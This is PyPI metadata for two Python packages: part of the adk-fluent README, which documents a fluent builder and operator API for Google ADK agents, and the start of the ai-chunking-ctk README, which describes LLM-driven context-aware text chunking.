| `expect(pred, msg)` | Assert state contract | Raises `ValueError` on failure |
| `.mock(responses)` | Bypass LLM for testing | `before_model_callback` → `LlmResponse` |
| `.retry_if(pred)` | Retry while condition holds | `LoopAgent` + checkpoint escalate |
| `map_over(key, agent)` | Iterate agent over list | Custom `BaseAgent` loop |
| `.timeout(seconds)` | Time-bound execution | `asyncio` deadline + cancel |
| `gate(pred, msg)` | Human-in-the-loop approval | `EventActions(escalate=True)` |
| `race(a, b, ...)` | First-to-finish wins | `asyncio.wait(FIRST_COMPLETED)` |
All operators are **immutable** -- sub-expressions can be safely reused:
```python
review = agent_a >> agent_b
pipeline_1 = review >> agent_c # Independent
pipeline_2 = review >> agent_d # Independent
```
### Function Steps
Plain Python functions compose with `>>` as zero-cost workflow nodes (no LLM call):
```python
def merge_research(state):
return {"research": state["web"] + "\n" + state["papers"]}
pipeline = web_agent >> merge_research >> writer_agent
```
### Typed Output
`@` binds a Pydantic schema as the agent's output contract:
```python
from pydantic import BaseModel
class Report(BaseModel):
title: str
body: str
agent = Agent("writer").model("gemini-2.5-flash").instruct("Write.") @ Report
```
### Fallback Chains
`//` tries each agent in order -- first success wins:
```python
answer = (
Agent("fast").model("gemini-2.0-flash").instruct("Quick answer.")
// Agent("thorough").model("gemini-2.5-pro").instruct("Detailed answer.")
)
```
### Conditional Loops
`* until(pred)` loops until a predicate on session state is satisfied:
```python
from adk_fluent import until
loop = (
Agent("writer").model("gemini-2.5-flash").instruct("Write.").outputs("quality")
>> Agent("reviewer").model("gemini-2.5-flash").instruct("Review.")
) * until(lambda s: s.get("quality") == "good", max=5)
```
### State Transforms
`S` factories return dict transforms that compose with `>>`:
```python
from adk_fluent import S
pipeline = (
(web_agent | scholar_agent)
>> S.merge("web", "scholar", into="research")
>> S.default(confidence=0.0)
>> S.rename(research="input")
>> writer_agent
)
```
| Factory | Purpose |
|---------|---------|
| `S.pick(*keys)` | Keep only specified keys |
| `S.drop(*keys)` | Remove specified keys |
| `S.rename(**kw)` | Rename keys |
| `S.default(**kw)` | Fill missing keys |
| `S.merge(*keys, into=)` | Combine keys |
| `S.transform(key, fn)` | Map a single value |
| `S.compute(**fns)` | Derive new keys |
| `S.guard(pred)` | Assert invariant |
| `S.log(*keys)` | Debug-print |
### IR, Backends, and Middleware (v4)
Builders can compile to an intermediate representation (IR) for inspection, testing, and alternative backends:
```python
from adk_fluent import Agent, ExecutionConfig, CompactionConfig
# IR: inspect the agent tree without building
pipeline = Agent("a") >> Agent("b") >> Agent("c")
ir = pipeline.to_ir() # Returns frozen dataclass tree
# to_app(): compile through IR to a native ADK App
app = pipeline.to_app(config=ExecutionConfig(
app_name="my_app",
resumable=True,
compaction=CompactionConfig(interval=10),
))
# Middleware: app-global cross-cutting behavior
from adk_fluent import Middleware, RetryMiddleware, StructuredLogMiddleware
app = (
Agent("a") >> Agent("b")
).middleware(RetryMiddleware(max_retries=3)).to_app()
# Data contracts: verify pipeline wiring at build time
from pydantic import BaseModel
from adk_fluent.testing import check_contracts
class Intent(BaseModel):
category: str
confidence: float
pipeline = Agent("classifier").produces(Intent) >> Agent("resolver").consumes(Intent)
issues = check_contracts(pipeline.to_ir()) # [] = all good
# Deterministic testing without LLM calls
from adk_fluent.testing import mock_backend, AgentHarness
harness = AgentHarness(pipeline, backend=mock_backend({
"classifier": {"category": "billing", "confidence": 0.9},
"resolver": "Ticket #1234 created.",
}))
# Graph visualization
print(pipeline.to_mermaid()) # Mermaid diagram source
```
```python
# Tool confirmation (human-in-the-loop approval)
agent = Agent("ops").tool(deploy_fn, require_confirmation=True)
# Resource DI (hide infra params from LLM)
agent = Agent("lookup").tool(search_db).inject(db=my_database)
```
### Deterministic Routing
Route on session state without LLM calls:
```python
from adk_fluent import Agent
from adk_fluent._routing import Route
classifier = Agent("classify").model("gemini-2.5-flash").instruct("Classify intent.").outputs("intent")
booker = Agent("booker").model("gemini-2.5-flash").instruct("Book flights.")
info = Agent("info").model("gemini-2.5-flash").instruct("Provide info.")
# Route on exact match — zero LLM calls for routing
pipeline = classifier >> Route("intent").eq("booking", booker).eq("info", info)
# Dict shorthand
pipeline = classifier >> {"booking": booker, "info": info}
```
### Conditional Gating
```python
# Only runs if predicate(state) is truthy
enricher = (
Agent("enricher")
.model("gemini-2.5-flash")
.instruct("Enrich the data.")
.proceed_if(lambda s: s.get("valid") == "yes")
)
```
### Tap (Observe Without Mutating)
`tap(fn)` creates a zero-cost observation step. It reads state but never writes back -- perfect for logging, metrics, and debugging:
```python
from adk_fluent import tap
pipeline = (
writer
>> tap(lambda s: print("Draft:", s.get("draft", "")[:50]))
>> reviewer
)
# Also available as a method
pipeline = writer.tap(lambda s: log_metrics(s)) >> reviewer
```
### Expect (State Assertions)
`expect(pred, msg)` asserts a state contract at a pipeline step. Raises `ValueError` if the predicate fails:
```python
from adk_fluent import expect
pipeline = (
writer
>> expect(lambda s: "draft" in s, "Writer must produce a draft")
>> reviewer
)
```
### Mock (Testing Without LLM)
`.mock(responses)` bypasses LLM calls with canned responses. Uses the same `before_model_callback` mechanism as ADK's `ReplayPlugin`, but scoped to a single agent:
```python
# List of responses (cycles when exhausted)
agent = Agent("writer").model("gemini-2.5-flash").instruct("Write.").mock(["Draft 1", "Draft 2"])
# Callable for dynamic mocking
agent = Agent("echo").model("gemini-2.5-flash").mock(lambda req: "Mocked response")
```
### Retry If
`.retry_if(pred)` retries agent execution while the predicate returns True. Thin wrapper over `loop_until` with inverted logic:
```python
agent = (
Agent("writer").model("gemini-2.5-flash")
.instruct("Write a high-quality draft.").outputs("quality")
.retry_if(lambda s: s.get("quality") != "good", max_retries=3)
)
```
### Map Over
`map_over(key, agent)` iterates an agent over each item in a state list:
```python
from adk_fluent import map_over
pipeline = (
fetcher
>> map_over("documents", summarizer, output_key="summaries")
>> compiler
)
```
### Timeout
`.timeout(seconds)` wraps an agent with a time limit. Raises `asyncio.TimeoutError` if exceeded:
```python
agent = Agent("researcher").model("gemini-2.5-pro").instruct("Deep research.").timeout(60)
```
### Gate (Human-in-the-Loop)
`gate(pred, msg)` pauses the pipeline for human approval when the condition is met. Uses ADK's `escalate` mechanism:
```python
from adk_fluent import gate
pipeline = (
analyzer
>> gate(lambda s: s.get("risk") == "high", message="Approve high-risk action?")
>> executor
)
```
### Race (First-to-Finish)
`race(a, b, ...)` runs agents concurrently and keeps only the first to finish:
```python
from adk_fluent import race
winner = race(
Agent("fast").model("gemini-2.0-flash").instruct("Quick answer."),
Agent("thorough").model("gemini-2.5-pro").instruct("Detailed answer."),
)
```
### Full Composition
All operators compose into a single expression:
```python
from pydantic import BaseModel
from adk_fluent import Agent, S, until
class Report(BaseModel):
title: str
body: str
confidence: float
pipeline = (
( Agent("web").model("gemini-2.5-flash").instruct("Search web.")
| Agent("scholar").model("gemini-2.5-flash").instruct("Search papers.")
)
>> S.merge("web", "scholar", into="research")
>> Agent("writer").model("gemini-2.5-flash").instruct("Write.") @ Report
// Agent("writer_b").model("gemini-2.5-pro").instruct("Write.") @ Report
>> (
Agent("critic").model("gemini-2.5-flash").instruct("Score.").outputs("confidence")
>> Agent("reviser").model("gemini-2.5-flash").instruct("Improve.")
) * until(lambda s: s.get("confidence", 0) >= 0.85, max=4)
)
```
## Fluent API Reference
### Agent Builder
The `Agent` builder wraps ADK's `LlmAgent`. Every method returns `self` for chaining.
#### Core Configuration
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.model(name)` | `model` | LLM model identifier (`"gemini-2.5-flash"`, `"gemini-2.5-pro"`, etc.) |
| `.instruct(text_or_fn)` | `instruction` | System instruction. Accepts a string or `Callable[[ReadonlyContext], str]` |
| `.describe(text)` | `description` | Agent description (used in delegation and tool descriptions) |
| `.outputs(key)` | `output_key` | Store the agent's final response in session state under this key |
| `.tool(fn)` | — | Add a tool function or `BaseTool` instance. Multiple calls accumulate |
| `.build()` | — | Resolve into a native ADK `LlmAgent` |
#### Prompt & Context Control
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.instruct(text)` | `instruction` | Dynamic instruction. Supports `{variable}` placeholders auto-resolved from session state |
| `.instruct(fn)` | `instruction` | Callable receiving `ReadonlyContext`, returns string. Full programmatic control |
| `.static(content)` | `static_instruction` | Cacheable instruction that never changes. Sent as system instruction for context caching |
| `.history("none")` | `include_contents` | Control conversation history: `"default"` (full history) or `"none"` (stateless) |
| `.global_instruct(text)` | `global_instruction` | Instruction inherited by all sub-agents |
| `.inject_context(fn)` | — | Prepend dynamic context via `before_model_callback`. The function receives callback context, returns a string |
Template variables in string instructions are auto-resolved from session state:
```python
# {topic} and {style} are replaced at runtime from session state
agent = Agent("writer").instruct("Write about {topic} in a {style} tone.")
```
This composes naturally with the expression algebra:
```python
pipeline = (
Agent("classifier").instruct("Classify.").outputs("topic")
>> S.default(style="professional")
>> Agent("writer").instruct("Write about {topic} in a {style} tone.")
)
```
Optional variables use `?` suffix (`{maybe_key?}` returns empty string if missing). Namespaced keys: `{app:setting}`, `{user:pref}`, `{temp:scratch}`.
#### Prompt Builder
For multi-section prompts, the `Prompt` builder provides structured composition:
```python
from adk_fluent import Prompt
prompt = (
Prompt()
.role("You are a senior code reviewer.")
.context("The codebase uses Python 3.11 with type hints.")
.task("Review the code for bugs and security issues.")
.constraint("Be concise. Max 5 bullet points.")
.constraint("No false positives.")
.format("Return markdown with ## sections.")
.example("Input: x=eval(input()) | Output: - **Critical**: eval() on user input")
)
agent = Agent("reviewer").model("gemini-2.5-flash").instruct(prompt).build()
```
Sections are emitted in a fixed order (role, context, task, constraints, format, examples) regardless of call order. Prompts are composable and reusable:
```python
base_prompt = Prompt().role("You are a senior engineer.").constraint("Be precise.")
reviewer = Agent("reviewer").instruct(base_prompt + Prompt().task("Review code."))
writer = Agent("writer").instruct(base_prompt + Prompt().task("Write documentation."))
```
| Method | Description |
|--------|-------------|
| `.role(text)` | Agent persona (emitted without header) |
| `.context(text)` | Background information |
| `.task(text)` | Primary objective |
| `.constraint(text)` | Rules to follow (multiple calls accumulate) |
| `.format(text)` | Desired output format |
| `.example(text)` | Few-shot examples (multiple calls accumulate) |
| `.section(name, text)` | Custom named section |
| `.merge(other)` / `+` | Combine two Prompts |
| `.build()` / `str()` | Compile to instruction string |
#### Static Instructions & Context Caching
Split prompts into cacheable and dynamic parts:
```python
agent = (
Agent("analyst")
.model("gemini-2.5-flash")
.static("You are a financial analyst. Here is the 50-page annual report: ...")
.instruct("Answer the user's question about the report.")
.build()
)
```
When `.static()` is set, the static content goes as a system instruction (eligible for context caching), while `.instruct()` content goes as user content. This avoids re-processing large static contexts on every turn.
#### Dynamic Context Injection
Prepend runtime context to every LLM call:
```python
agent = (
Agent("support")
.model("gemini-2.5-flash")
.instruct("Help the customer.")
.inject_context(lambda ctx: f"Customer: {ctx.state.get('customer_name', 'unknown')}")
.inject_context(lambda ctx: f"Plan: {ctx.state.get('plan', 'free')}")
)
```
Each `.inject_context()` call accumulates. The function receives the callback context and returns a string that gets prepended as content before the LLM processes the request.
#### Callbacks
All callback methods are **additive** -- multiple calls accumulate handlers, never replace:
| Method | Alias for | Description |
|--------|-----------|-------------|
| `.before_model(fn)` | `before_model_callback` | Runs before each LLM call. Receives `(callback_context, llm_request)` |
| `.after_model(fn)` | `after_model_callback` | Runs after each LLM call. Receives `(callback_context, llm_response)` |
| `.before_agent(fn)` | `before_agent_callback` | Runs before agent execution |
| `.after_agent(fn)` | `after_agent_callback` | Runs after agent execution |
| `.before_tool(fn)` | `before_tool_callback` | Runs before each tool call |
| `.after_tool(fn)` | `after_tool_callback` | Runs after each tool call |
| `.on_model_error(fn)` | `on_model_error_callback` | Handles LLM errors |
| `.on_tool_error(fn)` | `on_tool_error_callback` | Handles tool errors |
| `.guardrail(fn)` | — | Registers `fn` as both `before_model` and `after_model` |
Conditional variants append only when the condition is true:
```python
agent = (
Agent("service")
.before_model_if(debug_mode, log_fn)
.after_model_if(audit_enabled, audit_fn)
)
```
#### Control Flow
| Method | Description |
|--------|-------------|
| `.proceed_if(pred)` | Only run this agent if `pred(state)` is truthy. Uses `before_agent_callback` |
| `.loop_until(pred, max_iterations=N)` | Wrap in a loop that exits when `pred(state)` is satisfied |
| `.retry_if(pred, max_retries=3)` | Retry while `pred(state)` returns True. Inverse of `loop_until` |
| `.mock(responses)` | Bypass LLM with canned responses (list or callable). For testing |
| `.tap(fn)` | Append observation step: `self >> tap(fn)`. Returns Pipeline |
| `.timeout(seconds)` | Wrap with time limit. Raises `asyncio.TimeoutError` on expiry |
#### Delegation (LLM-Driven Routing)
```python
# The coordinator's LLM decides when to delegate
coordinator = (
Agent("coordinator")
.model("gemini-2.5-flash")
.instruct("Route tasks to the right specialist.")
.delegate(Agent("math").model("gemini-2.5-flash").instruct("Solve math."))
.delegate(Agent("code").model("gemini-2.5-flash").instruct("Write code."))
.build()
)
```
`.delegate(agent)` wraps the sub-agent in an `AgentTool` so the coordinator's LLM can invoke it by name.
#### One-Shot Execution
| Method | Description |
|--------|-------------|
| `.ask(prompt)` | Send a prompt, get response text. No Runner/Session boilerplate |
| `.ask_async(prompt)` | Async version of `.ask()` |
| `.stream(prompt)` | Async generator yielding response text chunks |
| `.events(prompt)` | Async generator yielding raw ADK `Event` objects |
| `.map(prompts, concurrency=5)` | Batch execution against multiple prompts |
| `.map_async(prompts, concurrency=5)` | Async batch execution |
| `.session()` | Create an interactive `async with` session context manager |
| `.test(prompt, contains=, matches=, equals=)` | Smoke test: calls `.ask()` and asserts output |
#### Cloning and Variants
```python
base = Agent("base").model("gemini-2.5-flash").instruct("Be helpful.")
# Clone — independent deep copy with new name
math_agent = base.clone("math").instruct("Solve math.")
# with_() — immutable variant (original unchanged)
creative = base.with_(name="creative", model="gemini-2.5-pro")
```
#### Validation and Introspection
| Method | Description |
|--------|-------------|
| `.validate()` | Try `.build()` and raise `ValueError` with clear message on failure. Returns `self` |
| `.explain()` | Multi-line summary of builder state (config fields, callbacks, lists) |
| `.to_dict()` / `.to_yaml()` | Serialize builder state (inspection only, no round-trip) |
#### Dynamic Field Forwarding
Any ADK `LlmAgent` field can be set through `__getattr__`, even without an explicit method:
```python
agent = Agent("x").generate_content_config(my_config) # Works via forwarding
```
Misspelled names raise `AttributeError` with the closest match suggestion.
### Workflow Builders
All workflow builders accept both built ADK agents and fluent builders as arguments. Builders are auto-built at `.build()` time, enabling safe sub-expression reuse.
#### Pipeline (Sequential)
```python
from adk_fluent import Pipeline, Agent
# Builder style — full control over each step
pipeline = (
Pipeline("data_processing")
.step(Agent("extractor", "gemini-2.5-flash").instruct("Extract entities.").outputs("entities"))
.step(Agent("enricher", "gemini-2.5-flash").instruct("Enrich {entities}.").tool(lookup_db))
.step(Agent("formatter", "gemini-2.5-flash").instruct("Format output.").history("none"))
.build()
)
# Operator style — same result
pipeline = (
Agent("extractor", "gemini-2.5-flash").instruct("Extract entities.").outputs("entities")
>> Agent("enricher", "gemini-2.5-flash").instruct("Enrich {entities}.").tool(lookup_db)
>> Agent("formatter", "gemini-2.5-flash").instruct("Format output.").history("none")
).build()
```
| Method | Description |
|--------|-------------|
| `.step(agent)` | Append an agent as the next step. Lazy -- built at `.build()` time |
| `.build()` | Resolve into a native ADK `SequentialAgent` |
#### FanOut (Parallel)
```python
from adk_fluent import FanOut, Agent
# Builder style — named branches with different models
fanout = (
FanOut("research")
.branch(Agent("web", "gemini-2.5-flash").instruct("Search the web.").outputs("web_results"))
.branch(Agent("papers", "gemini-2.5-pro").instruct("Search academic papers.").outputs("paper_results"))
.branch(Agent("internal", "gemini-2.5-flash").instruct("Search internal docs.").outputs("internal_results"))
.build()
)
# Operator style
fanout = (
Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_results")
| Agent("papers", "gemini-2.5-pro").instruct("Search papers.").outputs("paper_results")
| Agent("internal", "gemini-2.5-flash").instruct("Search internal docs.").outputs("internal_results")
).build()
```
| Method | Description |
|--------|-------------|
| `.branch(agent)` | Add a parallel branch agent. Lazy -- built at `.build()` time |
| `.build()` | Resolve into a native ADK `ParallelAgent` |
#### Loop
```python
from adk_fluent import Loop, Agent, until
# Builder style — explicit loop configuration
loop = (
Loop("quality_loop")
.step(Agent("writer", "gemini-2.5-flash").instruct("Write draft.").outputs("quality"))
.step(Agent("reviewer", "gemini-2.5-flash").instruct("Review and score."))
.max_iterations(5)
.until(lambda s: s.get("quality") == "good")
.build()
)
# Operator style
loop = (
Agent("writer", "gemini-2.5-flash").instruct("Write draft.").outputs("quality")
>> Agent("reviewer", "gemini-2.5-flash").instruct("Review and score.")
) * until(lambda s: s.get("quality") == "good", max=5)
```
| Method | Description |
|--------|-------------|
| `.step(agent)` | Append a step agent. Lazy -- built at `.build()` time |
| `.max_iterations(n)` | Set maximum loop iterations |
| `.until(pred)` | Set exit predicate. Exits when `pred(state)` is truthy |
| `.build()` | Resolve into a native ADK `LoopAgent` |
#### Combining Builder and Operator Styles
The styles mix freely. Use builders for complex individual steps and operators for composition:
```python
from adk_fluent import Agent, Pipeline, FanOut, S, until, Prompt
# Define reusable agents with full builder configuration
researcher = (
Agent("researcher", "gemini-2.5-flash")
.instruct(Prompt().role("You are a research analyst.").task("Find relevant information."))
.tool(search_tool)
.before_model(log_fn)
.outputs("findings")
)
writer = (
Agent("writer", "gemini-2.5-pro")
.instruct("Write a report about {findings}.")
.static("Company style guide: use formal tone, cite sources...")
.outputs("draft")
)
reviewer = (
Agent("reviewer", "gemini-2.5-flash")
.instruct("Score the draft 1-10 for quality.")
.outputs("quality_score")
)
# Compose with operators — each sub-expression is reusable
research_phase = (
FanOut("gather")
.branch(researcher.clone("web").tool(web_search))
.branch(researcher.clone("papers").tool(paper_search))
)
pipeline = (
research_phase
>> S.merge("web", "papers", into="findings")
>> writer
>> (reviewer >> writer) * until(lambda s: int(s.get("quality_score", 0)) >= 8, max=3)
)
```
### Presets
Reusable configuration bundles:
```python
from adk_fluent.presets import Preset
production = Preset(model="gemini-2.5-flash", before_model=log_fn, after_model=audit_fn)
agent = Agent("service").instruct("Handle requests.").use(production).build()
```
### @agent Decorator
```python
from adk_fluent.decorators import agent
@agent("weather_bot", model="gemini-2.5-flash")
def weather_bot():
"""You help with weather queries."""
@weather_bot.tool
def get_weather(city: str) -> str:
return f"Sunny in {city}"
built = weather_bot.build()
```
### Typed State Keys
```python
from adk_fluent import StateKey
call_count = StateKey("call_count", scope="session", type=int, default=0)
# In callbacks/tools:
current = call_count.get(ctx)
call_count.increment(ctx)
```
## Run with `adk web`
### Environment Setup
Before running any example, copy the `.env.example` and fill in your Google Cloud credentials:
```bash
cd examples
cp .env.example .env
# Edit .env with your values:
# GOOGLE_CLOUD_PROJECT=your-project-id
# GOOGLE_CLOUD_LOCATION=us-central1
# GOOGLE_GENAI_USE_VERTEXAI=TRUE
```
Every agent loads these variables automatically via `load_dotenv()`.
### Run an Example
```bash
cd examples
adk web simple_agent # Basic agent
adk web weather_agent # Agent with tools
adk web research_team # Multi-agent pipeline
adk web real_world_pipeline # Full expression language
adk web route_branching # Deterministic routing
adk web delegate_pattern # LLM-driven delegation
adk web operator_composition # >> | * operators
adk web function_steps # >> fn (function nodes)
adk web until_operator # * until(pred)
adk web typed_output # @ Schema
adk web fallback_operator # // fallback
adk web state_transforms # S.pick, S.rename, ...
adk web full_algebra # All operators together
adk web tap_observation # tap() observation steps
adk web mock_testing # .mock() for testing
adk web race # race() first-to-finish
```
43 runnable examples covering all features. See [`examples/`](examples/) for the full list.
## Cookbook
43 annotated examples in [`examples/cookbook/`](examples/cookbook/) with side-by-side Native ADK vs Fluent comparisons. Each file is also a runnable test:
```bash
pytest examples/cookbook/ -v
```
| # | Example | Feature |
|---|---------|---------|
| 01 | Simple Agent | Basic agent creation |
| 02 | Agent with Tools | Tool registration |
| 03 | Callbacks | Additive callback accumulation |
| 04 | Sequential Pipeline | Pipeline builder |
| 05 | Parallel FanOut | FanOut builder |
| 06 | Loop Agent | Loop builder |
| 07 | Team Coordinator | Sub-agent delegation |
| 08 | One-Shot Ask | `.ask()` execution |
| 09 | Streaming | `.stream()` execution |
| 10 | Cloning | `.clone()` deep copy |
| 11 | Inline Testing | `.test()` smoke tests |
| 12 | Guardrails | `.guardrail()` shorthand |
| 13 | Interactive Session | `.session()` context manager |
| 14 | Dynamic Forwarding | `__getattr__` field access |
| 15 | Production Runtime | Full agent setup |
| 16 | Operator Composition | `>>` `\|` `*` operators |
| 17 | Route Branching | Deterministic `Route` |
| 18 | Dict Routing | `>>` dict shorthand |
| 19 | Conditional Gating | `.proceed_if()` |
| 20 | Loop Until | `.loop_until()` |
| 21 | StateKey | Typed state descriptors |
| 22 | Presets | `Preset` + `.use()` |
| 23 | With Variants | `.with_()` immutable copy |
| 24 | @agent Decorator | Decorator syntax |
| 25 | Validate & Explain | `.validate()` `.explain()` |
| 26 | Serialization | `to_dict` / `to_yaml` |
| 27 | Delegate Pattern | `.delegate()` |
| 28 | Real-World Pipeline | Full composition |
| 29 | Function Steps | `>> fn` zero-cost transforms |
| 30 | Until Operator | `* until(pred)` conditional loops |
| 31 | Typed Output | `@ Schema` output contracts |
| 32 | Fallback Operator | `//` first-success chains |
| 33 | State Transforms | `S.pick`, `S.rename`, `S.merge`, ... |
| 34 | Full Algebra | All operators composed together |
| 35 | Tap Observation | `tap()` pure observation steps |
| 36 | Expect Assertions | `expect()` state contract checks |
| 37 | Mock Testing | `.mock()` bypass LLM for tests |
| 38 | Retry If | `.retry_if()` conditional retry |
| 39 | Map Over | `map_over()` iterate agent over list |
| 40 | Timeout | `.timeout()` time-bound execution |
| 41 | Gate Approval | `gate()` human-in-the-loop |
| 42 | Race | `race()` first-to-finish wins |
## How It Works
adk-fluent is **auto-generated** from the installed ADK package:
```
scanner.py ──> manifest.json ──> seed_generator.py ──> seed.toml ──> generator.py ──> Python code
^
seed.manual.toml
(hand-crafted extras)
```
1. **Scanner** introspects all ADK modules and produces `manifest.json`
2. **Seed Generator** classifies classes and produces `seed.toml` (merged with manual extras)
3. **Code Generator** emits fluent builders, `.pyi` type stubs, and test scaffolds
This means adk-fluent automatically stays in sync with ADK updates:
```bash
pip install --upgrade google-adk
just all # Regenerate everything
just test # Verify
```
## API Reference
Generated API docs are in [`docs/generated/api/`](docs/generated/api/):
- [`agent.md`](docs/generated/api/agent.md) -- Agent, BaseAgent builders
- [`workflow.md`](docs/generated/api/workflow.md) -- Pipeline, FanOut, Loop
- [`tool.md`](docs/generated/api/tool.md) -- 40+ tool builders
- [`service.md`](docs/generated/api/service.md) -- Session, artifact, memory services
- [`config.md`](docs/generated/api/config.md) -- Configuration builders
- [`plugin.md`](docs/generated/api/plugin.md) -- Plugin builders
- [`runtime.md`](docs/generated/api/runtime.md) -- Runner, App builders
Migration guide: [`docs/generated/migration/from-native-adk.md`](docs/generated/migration/from-native-adk.md)
## Features
- **130+ builders** covering agents, tools, configs, services, plugins, planners, executors
- **Expression algebra**: `>>` (sequence), `|` (parallel), `*` (loop), `@` (typed output), `//` (fallback), `>> fn` (transforms), `S` (state ops), `Route` (branch)
- **Prompt builder**: structured multi-section prompt composition via `Prompt`
- **Template variables**: `{key}` in instructions auto-resolved from session state
- **Context control**: `.static()` for cacheable context, `.history("none")` for stateless agents, `.inject_context()` for dynamic preambles
- **State transforms**: `S.pick`, `S.drop`, `S.rename`, `S.default`, `S.merge`, `S.transform`, `S.compute`, `S.guard`
- **Full IDE autocomplete** via `.pyi` type stubs
- **Zero-maintenance** `__getattr__` forwarding for any ADK field
- **Callback accumulation**: multiple `.before_model()` calls append, not replace
- **Typo detection**: misspelled methods raise `AttributeError` with suggestions
- **Deterministic routing**: `Route` evaluates predicates against session state (zero LLM calls)
- **One-shot execution**: `.ask()`, `.stream()`, `.session()`, `.map()` without Runner boilerplate
- **Presets**: reusable config bundles via `Preset` + `.use()`
- **Cloning**: `.clone()` and `.with_()` for independent variants
- **Validation**: `.validate()` catches config errors at definition time
- **Serialization**: `to_dict()`, `to_yaml()`, `from_dict()`, `from_yaml()`
- **@agent decorator**: FastAPI-style agent definition
- **Typed state**: `StateKey` with scope, type, and default
## Development
```bash
# Setup
uv venv .venv && source .venv/bin/activate
uv pip install google-adk pytest pyright
# Full pipeline: scan -> seed -> generate -> docs
just all
# Run tests (780+ tests)
just test
# Type check generated stubs
just typecheck
# Generate cookbook stubs for new builders
just cookbook-gen
# Convert cookbook to adk-web agent folders
just agents
```
## Publishing
Releases are published automatically to PyPI when a version tag is pushed:
```bash
# 1. Bump version in pyproject.toml
# 2. Commit and tag
git tag v0.2.0
git push origin v0.2.0
# 3. CI runs tests -> builds -> publishes to PyPI automatically
```
TestPyPI publishing is available manually via the GitLab CI web interface.
## License
MIT
| text/markdown | adk-fluent contributors | null | null | null | null | adk, agents, builder, fluent, google, llm | [
"Development Status :: 3 - Alpha",
"Framework :: Pydantic",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"google-adk>=1.20.0",
"pre-commit>=3.0; extra == \"dev\"",
"pyright>=1.1; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"ruff>=0.9; extra == \"dev\"",
"furo>=2024.0; extra == \"docs\"",
"myst-parser>=3.0; extra == \"docs\"",
"sphinx-copybutton>=0.5; extra == \"docs\"",
"sphinx-design>=0.6; extra == \"docs\"",
"sphinx>=7.0; extra == \"docs\"",
"python-dotenv>=1.0; extra == \"examples\"",
"pyyaml>=6.0; extra == \"yaml\""
] | [] | [] | [] | [
"Homepage, https://github.com/vamsiramakrishnan/adk-fluent",
"Repository, https://github.com/vamsiramakrishnan/adk-fluent",
"Issues, https://github.com/vamsiramakrishnan/adk-fluent/issues",
"Documentation, https://vamsiramakrishnan.github.io/adk-fluent/",
"Changelog, https://github.com/vamsiramakrishnan/adk-fluent/blob/master/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:42:19.737501 | adk_fluent-0.6.0.tar.gz | 903,843 | 4c/de/507017087e836e8a3270d0d2e1e724b31b034dc586bbcd8633b776acb630/adk_fluent-0.6.0.tar.gz | source | sdist | null | false | 8b58eee014fe47c6e6f8df5c37d884be | b8dca56cbca068d45f352769346ba642f74d40f66e9f5dcb93f261b4da687568 | 4cde507017087e836e8a3270d0d2e1e724b31b034dc586bbcd8633b776acb630 | MIT | [
"LICENSE"
] | 233 |
2.4 | ai-chunking-ctk | 0.2.8 | Enterprise-grade context-aware semantic chunking library powered by LLMs. | # 🧠 Smart AI Chunking
**Context-Aware Semantic Chunking for RAG**
Smart AI Chunking 是一个专为大模型(RAG)设计的高级文本切分库。与传统的固定长度切分(Fixed-Size Chunking)不同,它采用**“先理解,后切分”**的两阶段策略,确保每个切片都包含完整的语义和全局上下文。
---
## ✨ 核心特性
- **🧠 全局上下文感知 (Context-Aware)**: 在切分前先由 AI 通读全文,提取叙事大纲(Narrative)和全局摘要。切分时,每个块都知道自己在全文中的位置。
- **🔪 语义坐标切分 (Coordinate Splitting)**: 不再机械地按 xxx 字切一刀,而是通过在文本中埋入隐形坐标,让 LLM 决定最自然的语义断点。
- **🚀 全并发加速 (High Performance)**: 采用异步流水线设计,文档扫描、摘要生成、切片处理全部并发执行,速度极快。
- **📝 标准化输出**: 每个块不仅包含文本,还包含**标题**、**摘要**和**上下文元数据**。
---
## 📦 安装
可以通过 PyPI 直接安装:
```bash
pip install ai-chunking-ctk
```
或者从源码安装:
```bash
git clone https://github.com/chutiankuo0121/ai-chunking.git
cd ai-chunking
pip install .
```
---
## ⚡ 快速开始
使用我们提供的高级 API,只需几行代码即可完成智能切分。
```python
import asyncio
import json
from ai_chunking import smart_chunk_file, get_openai_wrapper
my_llm = get_openai_wrapper(
api_key="sk-...",
model="deepseek-ai/deepseek-v3.2",
concurrency=20, # 并发数量
base_url="https://..."
)
async def main():
file_path = "document.md"
print(f"开始处理: {file_path}")
async for chunk in smart_chunk_file(
file_path=file_path,
llm_func=my_llm,
target_tokens=3500, # 每个块的目标长度
max_llm_context=256000 # 模型的最大上下文窗口
):
# 打印完整的 JSON 结果
print(json.dumps(chunk, indent=2, ensure_ascii=False))
if __name__ == "__main__":
asyncio.run(main())
```
---
## 🛠️ API 说明
### `smart_chunk_file`
这是本库的核心入口函数。
```python
async def smart_chunk_file(
file_path: str | Path,
llm_func: Callable[[str], Awaitable[str]],
target_tokens: int,
max_llm_context: int
) -> AsyncGenerator[Dict, None]
```
#### 参数
- **`file_path`**: 目标 Markdown 或文本文件路径。
- **`llm_func`**: 用户提供的异步 LLM 调用函数。接收 `prompt` (str),返回 `response` (str)。
- **`target_tokens`**: **(必填)** 每个切片的期望 Token 数(例如 2000-4000)。建议设为模型上下文的 1/3 到 1/10。
- **`max_llm_context`**: **(必填)** 当前 LLM 的最大上下文窗口(例如 128000)。系统会根据此值自动优化扫描步长。
#### 返回值
异步生成器,产出如下字典结构:
```json
{
"chunk_id": "ck_001",
"title": "Introduction to AI Chunking",
"summary": "This section introduces the concept of semantic chunking...",
"content": "Full text content of this chunk...",
"tokens": 850
}
```
---
## ⚙️ 原理简介
1. **Phase 1: Scanner (全知扫描)**
* 系统首先快速扫描整篇文档。
* 生成一份由此及彼的 **叙事大纲 (Narrative Plan)**。
* 为后续切分提供“上帝视角”。
2. **Phase 2: Splitter (坐标切分)**
* 根据目标 Token 数,将文本划分为待处理区间。
* 在区间内插入 `[ID: 10]` 等坐标标记。
